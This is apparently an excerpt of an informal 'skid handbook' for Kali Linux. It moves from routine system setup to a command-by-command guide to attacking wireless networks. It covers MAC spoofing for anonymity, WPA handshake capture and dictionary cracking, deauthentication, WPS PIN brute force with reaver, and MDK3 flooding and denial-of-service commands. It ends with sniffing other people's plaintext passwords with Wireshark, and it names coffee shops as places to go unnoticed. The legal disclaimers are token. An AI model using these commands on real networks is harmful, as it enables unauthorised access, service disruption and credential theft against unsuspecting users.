skidhandbook-r-2-21-2015
TRANSCRIPT
Keyboard shortcuts
If you've used other Linux distributions are you are used to having CTRL +ALT + T to open terminal. You've probably already noticed that the terminal shortcut is not enabled by default. Let's go ahead and fix this before we do anything else. Open System Tools >> Preferences >> System Settings.
Select Keyboard from the System Settings GUI.
Select Shortcuts
Select CustomShortcuts.
Click the plus sign.
Now let's add our shortcut for the terminal. You can name your shortcuts whatever you want. I'm going to call mine Terminal. The command for the shortcut is going to be its respective BASH command. In this case gnome-terminal.
gnome-terminal
One last step. Select the shortcut you have created and add the accelerator by pressing the key combination you want to use to open the shortcut.
Let's test it out. Hold CTRL + ALT and press T.
Notes
Proxy settings
/root/etc /apt.conf
/root/etc /bash.bashrc export ftp_proxy="ftp://user:password@proxyIP:port" export http_proxy="http://user:password@proxyIP:port" export https_proxy="https://user:password@proxyIP:port" export socks_proxy="https://user:password@proxyIP:port"
/etc/apt/apt.conf
Acquire::ftp::proxy “ftp://user:password@IP:port”;Acquire::http::proxy “http://user:password@IP:port”;Acquire::https::proxy “https://user:password@IP:port”;Acquire::socks::proxy “https://user:password@IP:port”;
You must save the log file. Log out. Then log back in for proxy settings to start working.
Configure SSH
Generate new keys. Kali comes with default SSH keys. You'll want to back them up before you make new keys.
cd /etc/ssh/mkdir keys_default
mv ssh_host_* keys_defaultdpkg-reconfigure openssh-server
MD5 checksums
md5sum ssh_host_*cd keys_defaultmd5sum *
cd
Start SSH
/etc/init.d/ssh start
Have a look at your listening services with this command
netstat -antp
Stop SSH
/etc/init.d/ssh stop
Checking repositories
Source repositories can be editing in etc/apt/sources.list
echo deb http://http.kali.org/kiali kali main contrib non-free >> /etc/apt/ sources.list
You can check your installed packages with dpkg -l
dpkg -l > list.txt
If you want to see if a particular tool is installed use.
dpkg -l | grep <toolname>
example
dpkg -l | grep aircrack-ng
Get updates and upgrades
To update your system.
apt-get update
To install upgrades
apt-get upgrade
There might be a newer version of Kali available. If there is we'll go ahead and upgrade our operating system with the following command.
apt-get dist-upgrade
You can do all of this with one command.
apt-get update && apt-get upgrade –y && apt-get dist- upgrade –y
Update Metasploit
msfupdate
Update Exploitdb Manually
cd /usr/share/exploitdb wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf archive.tar.bz2 rm archive.tar.bz2
Enable A Firewall
Well go ahead and install UFW(uncomplicated firewall)
apt-get install ufw
Now we'll enable the firewall.
ufw enable
Change your root password
passwd root
Create a non-root user
We'll use the adduser command to make a non-root user on the system. Example:
adduser donkeypuncher
Speeding things up
Preload will load commonly used binaries and dependancies into memory. It will work after the firsttime you restart your system.
apt-get install preload
Bleachbit
Bleachbit is a tool for cleaning unneeded files from your system such as cookies, temp files, and other junk. It will also wipe your swap space.
apt-get install bleachbit
Run bleachbit from the command.
bleachbit
Conserving system resources with BUM
Boot-up Manager (BUM) is a program that will allow you to easily manage programs that run at start time. You can choose what programs will run at start time to improve performance and conserve system resources.
To install BUM
apt-get install bum
To run BUM
bum
BUM will open a GUI. This is pretty easy. I'm not going to insult your intelligence by explaining it.
Before you can access any computers you'll have to access to a network that has computers on it. In this Chapter I will talk about ways of accessing wireless networks. There's a legal disclaimer that goes along with this. Accessing networks which you don't have permission to use is illegal. That being said let's begin.
Probably the easiest ways to get anonymous network access is to go to a coffee shop. It's pretty commonplace to see people sitting in coffee shops doing work on their laptop checking emails on a cell phone. You are not likely to be noticed unless you are blatant about what you are doing. Caffinehelps with wakefulness anyway. This is a win-win situation.
The very first command you're going to have to use is ifconfig. The output will something like this.
root@localhost:~# ifconfig eth0 Link encap:Ethernet HWaddr e4:25:3d:de:67:1d UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Interrupt:19
lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:9111 errors:0 dropped:0 overruns:0 frame:0 TX packets:9111 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2205169 (2.1 MiB) TX bytes:2205169 (2.1 MiB)
wlan0 Link encap:Ethernet HWaddr 58:74:da:5b:4e:2c UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:41843 errors:0 dropped:0 overruns:0 frame:0 TX packets:30245 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:44150260 (42.1 MiB) TX bytes:5793899 (5.5 MiB)
You'll notice there are 3 interfaces listed. wlan0 is our wireless interface in this instance. On your machine it might be something in the way of ath0 or wifi0 but it should be easy for you to figure our. You maybe have more interfaces or less depending on what networking devices you have plugged into your computer. If you are in the habit of cracking wifi on penetration testing jobs you will probably want a USB wireless dongle. Then you can disable your internal wireless card and just go ahead and use the USB device. Anyhow you might want to change the MAC address of yourwireless device for anonymity purposes. You can do this with macchanger. First though we will have to take drop our wireless interface with ifconfig.
Ifconfig wlan0 down
Now that our wireless interface is down we can change our mac address our MAC address with macchanger. I'll be using the random option -r to change my MAC to a new random MAC address.
macchanger -r wlan0
Now you'll need to bring the wireless interface back up with the following.
Ifconfig wlan0 up
You may want to set the mac address manually by using the -m option. The Xs represent Hexadecimal values. 0,1,2,4,5,6,7,8,9,a,b,c,d,e,f
Macchanger --mac=XX:XX:XX:XX:XX:XX wlan0
If you want to list of vender prefixes for mac addresses you can use the -l option.
macchanger -l
There are currenly 39 listings for MAC addresse prefixes and about 14699 non-wireless prefixes. Wireless MACs are listed here:
Wireless MACs: Num MAC Vendor --- --- ------ 0000 - 00:00:8f - Raytheon Raylink/WebGear Aviator2.4 0001 - 00:00:f0 - Samsung MagicLan (+ some other PrismII cards) 0002 - 00:00:f1 - Raytheon Raylink/WebGear Aviator2.4 0003 - 00:01:03 - 3Com 3CRWE62092A 0004 - 00:02:2d - Lucent (WaveLAN, Orinoco, Silver/Gold), Orinoco (Silver, PC24E), Buffalo and Avaya 0005 - 00:02:6f - Senao SL-2011CD 0006 - 00:02:78 - Samsung MagicLan (+ some other PrismII cards) 0007 - 00:02:a5 - Compaq WL110 0008 - 00:03:2f - Linksys WPC11, Repotec GL241101 0009 - 00:04:5a - Linksys WPC11, WUSB11 0010 - 00:04:75 - 3Com 3CRWE62092B 0011 - 00:04:e2 - SMC SMC2632W 0012 - 00:05:5d - D-Link DWL-650, DWL-650H 0013 - 00:06:25 - Linksys WPC11 v2.5, D-Link DCF-650W, Linksys WPC11 v3
0014 - 00:07:0e - Cisco AIR-PCM352 0015 - 00:07:50 - Cisco AIR-LMC352 0016 - 00:08:21 - Cisco AIR-PCM352 0017 - 00:09:43 - Cisco AIR-LMC352 0018 - 00:09:5b - Netgear MA701, MA401RA 0019 - 00:09:7c - Cisco AIR-LMC352 0020 - 00:09:e8 - Cisco AIR-LMC352 0021 - 00:0a:41 - Cisco AIR-PCM352 0022 - 00:0a:8a - Cisco AIR-PCM352 0023 - 00:30:65 - Apple Airport Card 2002 0024 - 00:30:ab - Netgear MA401 0025 - 00:30:bd - Belkin F5D6020 0026 - 00:40:96 - Cisco AIR-PC4800, 350, AIR-PCM340, AIR-PCM352 0027 - 00:50:08 - Compaq WL100 0028 - 00:50:da - 3Com 3CRWE73796B 0029 - 00:60:01 - Lucent WaveLAN Silver 0030 - 00:60:1d - Lucent WaveLAN Bronze, WaveLAN Gold, Silver, Orinoco Gold 0031 - 00:60:6d - Cabletron CSIBB-AA 0032 - 00:60:b3 - SMC SMC2642W 0033 - 00:80:c7 - Netwave (Xircom Netwave/Netwave Airsurfer) 0034 - 00:90:d1 - LeArtery SyncByAir LN101 0035 - 00:a0:f8 - Symbol Spectrum24 0036 - 00:0c:f1 - Intel Pro 2100 0037 - 00:e0:29 - OEM OEM 0038 - 08:00:0e - Old Lucent Wavelan 0039 - 08:00:46 - Sony PCWA-C10
You can find more about macchanger by reading the man page.
man macchanger
Links:http://psg.mtu.edu/pub/gnu/macchanger/http://alobbs.com/
At this point you'll want to connect to a network if you can. If you don't have the wireless password there are few ways to get it. Keep in mind that it is illegal penetrate networks you do not have permission to access. For this tutorial we are going to be using wifite. It's the easiest wireless auditing tool there is. It makes use of tools you already have installed like aircrack-ng and reaver.Wifite will start up and start finding wireless networks. It will make a menu and you can select fromavailable wireless networks to crack. Enter a selection or select all and press [Enter]. Wifite will try to capture and handshake and crack it. If it is unsuccessful it will run a WPS PIN search. More information can be found here. https://code.google.com/p/wifite/
In terminal run wifite.wifite
root@localhost:~# wifite
.;' `;, .;' ,;' `;, `;, WiFite v2 (r85) .;' ,;' ,;' `;, `;, `;, :: :: : ( ) : :: :: automated wireless auditor ':. ':. ':. /_\ ,:' ,:' ,:' ':. ':. /___\ ,:' ,:' designed for Linux ':. /_____\ ,:' / \
[+] scanning for wireless devices... [+] enabling monitor mode on wlan0... done [+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready. [0:00:03] scanning wireless networks. 0 targets and 0 clients found
[+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
NUM ESSID CH ENCR POWER WPS? CLIENT --- -------------------- -- ---- ----- ---- ------ 1 DonkeyPunchRodeo 1 WPA2 49db wps clients 2 Your_Mom 6 WPA2 30db no 3 <Length 9> 1 WEP 29db no 4 Dirty_College_Girl 3 WPA2 22db wps 5 SSID2 11 WPA 21db no 6 NotACrackHouse 6 WPA2 20db wps
Let wifite scan for access points and connected clients a few seconds then press CTRL+C and you will see something like this:
[+] select target numbers (1-16) separated by commas, or 'all':
Enter the number of the target you would like to audit and press [Enter]
wifite may or may not ask a few more questions and it will crack some wifi. Not you will have to have a wireless card that support monitoring and packet injection for this to work. If you would liketo know more you can visit these sites.http://www.aircrack-ng.orghttp://www.aircrack-ng.org/doku.php?id=compatibility_drivershttp://wireless.kernel.org/en/users/Download/stable/
Patching wireless drivers isn't in the scope of this manual. Basically if your wireless device doesn't support monitoring and injection will need to purchase that does. It's beter to spend $20-100 on a new wireless card or USB dongle than to spend hours looking up compatability information and trying patch drivers. Patching drivers is more technical than most of the stuff I'm going to talk aboutin this book.
If you don't have packet injection but your wireless card will support monitor mode you can still crack WPA with aircrack-ng. You won't be able to force a deauthentication and capture the handshake when the client reauthenticates. You will have to wait until a client logs in. If you are
trying to get a handshake from a fairly busy network this might only take a few of minutes. We covered wifite earlier in this section now we'll go over some tools that are a little more manual.
Rather than overloading you with information you really don't need to use the tool. I'm just going todo a basic walkthrough and explain each command step by step. In this tutorial I'm using the Desktop as my working directory. This is a good practice if you are Linux newb and you have limited knowledge of the Linux file system. I've been using Linux for a long time and I am familiar with the file system. But old habbits die hard. First things first.
cd Desktop
Drop your wireless interface.
ifconfig wlan0 down
Change your MAC addresses
macchanger -r wlan0
Put wireless card back up
ifconfig wlan0 up
Next we are going to put our wireless card into monitor mode (also called permiscuous mode)
airmon-ng start wlan0
Now we'll get a look the avilable wireless networks within antenna range with airodump-ng.
airodump-ng mon0
Let airodump do it's thing for a little while. Then stop it with CTRL + C
Copy the BSSID, ESSID and other import information into a text file as you will need this information for aircrack-ng.
Next we will run airodump-ng again and we will attempt to capture a handshake when a client logs in on the wireless access point. We will be adding in the -w option to write airodump-ng to a capture file. In this case the file will be called coolguy.
airodump-ng -w coolguy mon0
Wait for a client to login on the wireless access point and collect the handshake. If you don't like to wait you can use aireplay-ng force a deauthenticaion. To request a deauthentication issue the following following command:
aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c XX:XX:XX:XX:XX:XX wlan0
I'm going to give you the breakdown of this command and it's options. -0 is a deauthentication
request. And the 1 directly following it is the number of requests that will be sent. -a is the access point MAC address. The -c is the client that is connected to the wireless access point. -a is for access point -c is for client. Finally wlan0 is the name of our interface.
One deauthentication request usually does the trick. If you fail to to deauthenticate the client and capture a handshake you can run the command again. You have to wait several seconds for aireplay to do it's thing. You can't just run 100 consecutive deauthentications against a client. You have to allow the client time to reauthenticate itself on the access point. Of course you can also run a continuous deauthentication attack that will result in a denial of service conidition for wireless cleint. Don't do it. It's super annoying and it will also alert wireless users to suspicious activity on the wireless network.
Also note that authentication requests can be captured by anyone running a monitor device within wireless antenna range. Wifi ranges can be extended to several miles. So don't think there's nobody watching the airways just because you can't see them or they are not logged in on the target network.
If you are successful in capturing a handshake airodump-ng will show a message at the top right hand side of the screen that says handshake captured. Once you have captured the handshake you can press CTRL + C to stop airodump-ng.
Now that we have captured a handshake we can crack the wireless password with aircrack-ng. In this case we'll be running a dictionary attack against the wireless password.
aircrack-ng -e Fuck_The_Police -b 00:22:3F:0B:A0:1E -w /root/Desktop/rockyou.txt /root/Desktop/coolguy-01.cap
Let's a have a close look at this command. The -e option is the ESSID (The name of the network) in this case Fuck_The_Police. -b is the MAC address of the access point. -w is the path to our wordlist. /root/Desktop/rockyou.txt. Finally aircrack will need the path to our capture file /root/Desktop/coolguy-01.cap
When aircrack-ng finishes doing it's thing you will one of two results. Key found or key not found. The output in terminal will look something like this.
I have shown you how to crack a WPA key with aircrack-ng. Aircrack is great for running dictionary attacks against WPA keys. Now lets look at running a brute force attack against wifi protected setup (WPS) with reaver. A WPS pin attack is very simple. In fact it's probably one of the easiest hacks there is. We already know to change our mac address or use a USB device so as not to give away information about our computer so I'll not cover that again.
Start by putting our wireless device into monitor mode.
airmon-ng start wlan0
Now lets find some information about the wireless access point we will be attacking. We will need the MAC address of the AP and the channel running on.
airodump-ng mon0
Let airdump run for a long enough to for the access point information to become available. Press CTRL + C to stop airodump. Now we will run a wash, a wifi protected setup scanner.
wash -i mon0
We see our access point has WPS enabled and it's not locked. Let's go ahead and brute the WPS pin with reaver. Let's look at this basic reaver command. -i is our monitor mode interface (In this case mon0). -c is the channel our our access point is communicating on. -b is the access point MAC address. -vv is very is the very verbose option. If reaver has problems with the PIN search it will tellus with the verbose output option.
reaver -i mon0 -c 5 -b 00:22:3F:0B:A0:1E -vv
Our access point might be a little more picky than this. Here is a WPS PIN search with some more complicated options.
reaver -i mon0 -c 5 -b 00:22:3F:0B:A0:1E -vv -L -N -d 15 -T .5 -r 3:15
For more clarification on these commands see the man page.
man reaver
And you can find advanced options with the help option.
reaver -h
While we're talking about reaver let's also cover MDK3 attacks. Here are some basic MDK3 attacks. You can cause the router to reset with MDK3 this will also reset WPS lockouts.
We can flood the access point with fake clients.
mdk3 mon0 a -a 00:22:3F:0B:A0:1E -m
We can cause all of the wireless traffic to shut down if the access point supports TKIP or
AES+TKIP.
mdk3 mon0 d -b blacklist -c X
This command will continuously deauthentication. You will need to make a blank text document in your root folder named blacklist.
mdk3 monX b -t 00:22:3F:0B:A0:1E -c
Flood a clients with a bunch of fake access points. This is effective on windows devices and a few others.
mdk3 mon0 b -t 00:22:3F:0B:A0:1E -c
Another
mdk3 mon0 m -t 00:22:3F:0B:A0:1E
You can actually be running 5 different terminal windows at the same time right now: airodump, mdk3 a, mdk3 b, mdk3 d, and mdk3 m.
To check if the AP has reset run:
wash -i mon0 -C
Capturing Passwords
Let's talk about capturing plaint text passwords with wireshark.You can start wireshark from the terminal with this command
wireshark
Or you can open it from the menu. Your Linux desktop environment might be a little different from mine.
You should wireshark GUI now. You might be a warning when the program opens. Just open it. It's not a big deal. Everything works usually.
The first thing we will want to do is select our interface.
Once you have selected the interface you want click on the start button.
Now wireshark is running. You can get a lot of information with wireshark. There are something like 800 protocols supported by wireshark. There are a lot of filters. There are some books on packet analysis and all of the uses of wireshark.
If you would like to know more about wireshark visit https://www.wireshark.org/
Let's apply a filter. Click in the filter text box and enter
http
Now that we have wireshark running and filtering http traffic we can just sit back and drink a coffeeand wait for our targets to log in to some websites that are not proctected by SSL. Wireshark will show us the passwords. Ok so we've waited a few minutes and the target has logged into a website.
Let's see if we have successfully collected the target's login credentials. We can check by clicking the edit tab and selecting Find Packets from the drop down menu.
We'll get one more GUI form to select some stuff. We're going to select string by clicking the radio button next to word string at the top.
Then we'll select Packet Bytes by selecting the radio button.
Next we'll need to enter post into the text box.
post
Now click the find button.
We should see some highlighted packets. Click on of them and see what it says.
Scroll to the bottum and click the plus sign next to line based text data:
There's your plain text username and password.